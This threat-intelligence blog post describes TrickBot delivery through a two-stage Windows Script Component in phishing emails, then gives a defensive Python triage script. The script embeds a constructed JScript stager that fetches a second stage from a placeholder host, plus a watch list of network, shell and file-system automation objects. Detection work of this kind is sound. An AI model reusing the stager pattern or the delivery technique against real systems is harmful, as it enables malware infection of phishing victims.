Threat actors’ consistent pursuit of improved efficiency is a defining characteristic of the phishing threat landscape. One way to improve efficiency is to adopt an unusual delivery technique that not only distributes the malware but also evades anti-virus software and related technologies.
PhishMe Intelligence™ recently observed a change in how the TrickBot financial crimes and botnet malware is delivered. The new technique uses a Windows Script Component (WSC) containing XML-format scripts to stage the delivery of the malware payload. This not only makes payload delivery more complex, it also gives the threat actor more room for obfuscation and anti-virus evasion.
Although TrickBot has been delivered by a number of applications and techniques, such as macro scripting in Microsoft Office documents, this recent implementation is a notable development in malware-distribution mechanisms. First reported by PhishMe Intelligence on 21 July 2017, the technique was observed in a TrickBot analysis in which a WSC served as the malware’s initial delivery mechanism. The phishing messages associated with that analysis fraudulently impersonated the Horizon brand, possibly targeting United Kingdom residents. The WSC file is tiny because it contains only a set of instructions, wrapped in an XML-format script, for obtaining additional commands (Figure 1).
Once those additional instructions have been retrieved, the second XML script (Figure 2) supplies the locations of the malware payload, along with instructions for de-obfuscating the malware binary.
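The two-stage scriptlet described above gives defenders something concrete to look for at the mail gateway or in attachment triage: a small XML document whose `<script>` body reaches out for a second stage. The following is an added example written for this post, not code from PhishMe or from the campaign itself. It parses a WSC document and flags script bodies that combine an embedded URL with network, shell or file-system automation objects. Both input documents are constructed for the example (the `example.invalid` host, the progids and the classids are placeholders), and the watch list of object names is a heuristic chosen here, not an indicator list from the report.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample of a Windows Script Component written for this example.
# It models the shape of a stager (tiny file, script body that fetches a second
# XML document) but is not a file from any real campaign.
SAMPLE_WSC = """<?xml version="1.0"?>
<component>
  <registration progid="Example.Stager" classid="{00000000-0000-0000-0000-000000000000}"/>
  <public>
    <method name="Run"/>
  </public>
  <script language="JScript"><![CDATA[
    var next = "http://stage2.example.invalid/commands.xml";
    var req = new ActiveXObject("MSXML2.XMLHTTP");
    var sh  = new ActiveXObject("WScript.Shell");
    function Run() { req.open("GET", next, false); req.send(); }
  ]]></script>
</component>
"""

# A second constructed sample with no network or shell activity, for comparison.
BENIGN_WSC = """<?xml version="1.0"?>
<component>
  <registration progid="Example.Math" classid="{11111111-1111-1111-1111-111111111111}"/>
  <public><method name="Add"/></public>
  <script language="VBScript"><![CDATA[
    Function Add(a, b)
      Add = a + b
    End Function
  ]]></script>
</component>
"""

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)

# Automation objects whose presence in a tiny scriptlet is worth a closer look:
# HTTP fetch, shell execution, file-system access, binary stream handling.
# Assumption: this list is a heuristic chosen for this example.
WATCH_LIST = (
    "MSXML2.XMLHTTP",
    "WinHttp.WinHttpRequest",
    "WScript.Shell",
    "Scripting.FileSystemObject",
    "ADODB.Stream",
)

# Scriptlets in the described delivery chain are very small; anything under this
# size is noted as "tiny" in the result. Threshold is an assumption for this example.
TINY_BYTES = 4096


def triage_wsc(text):
    """Parse a WSC/scriptlet document and return a triage summary dict."""
    result = {
        "size": len(text),
        "tiny": len(text) < TINY_BYTES,
        "languages": [],
        "urls": [],
        "watch_hits": [],
        "verdict": "likely-benign",
    }
    try:
        root = ET.fromstring(text)
    except ET.ParseError as exc:
        # Malformed XML still deserves a look, but we cannot reason about it here.
        result["verdict"] = "unparseable"
        result["error"] = str(exc)
        return result

    for script in root.iter("script"):
        result["languages"].append(script.get("language", "unknown"))
        body = script.text or ""          # CDATA content arrives as plain text
        lowered = body.lower()
        result["urls"].extend(URL_RE.findall(body))
        result["watch_hits"].extend(
            name for name in WATCH_LIST if name.lower() in lowered
        )

    # A remote URL together with a fetch/execute object is the stager pattern;
    # either one alone is merely worth a human glance.
    if result["urls"] and result["watch_hits"]:
        result["verdict"] = "suspicious"
    elif result["urls"] or result["watch_hits"]:
        result["verdict"] = "review"
    return result


if __name__ == "__main__":
    for label, doc in (("stager", SAMPLE_WSC), ("benign", BENIGN_WSC)):
        print(label, triage_wsc(doc))
```

Because the parser works on the XML structure rather than on file extension, the same check applies whether the component arrives as `.wsc`, `.sct` or under a renamed extension; the script body is what the scriptlet host will execute, so that is what the triage inspects.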
Although this behavior has been observed in four PhishMe Intelligence analyses, only three of those analyses delivered TrickBot. The fourth delivered the GlobeImposter ransomware; however, other researchers reported that this same campaign had delivered TrickBot earlier in the day on 26 July 2017. Regardless of the intended malware family, the technique implemented in the second script lets threat actors change payload locations and/or malware families while keeping the delivery application resilient to detection. With a distribution method that works, threat actors are attempting to take their success using TrickBot – or any malware family – to another level. The added layer of obfuscation in the secondary script allows the application to potentially bypass security controls and anti-virus technologies.
While delivery via this small, initial WSC script is relatively new to the phishing threat landscape, its use shows a simple yet effective way of distributing malicious content to the intended targets. Such techniques demonstrate the evolution of the phishing threat landscape and should spur security professionals to build a comprehensive defense against them. The best approach is to combine tactical observations and atomic indicators with a strategic view of threat actors’ goals. Ultimately, defenders should not focus on just one attack vector or malware tool, but should anticipate the strategy threat actors use to accomplish their mission. In many cases, that mission depends on the success of phishing emails.
Understanding how attackers craft and deploy these messages allows an organization to prepare and empower its email users. Users can then engage critically with the messages they receive and, when a suspicious email is detected, report it to the security and incident responders defending the enterprise. These internal reports can be compared with and combined with external sources to help network defenders overcome threats at a tactical level, and to apply those tactics as part of a greater strategy against any phishing threat.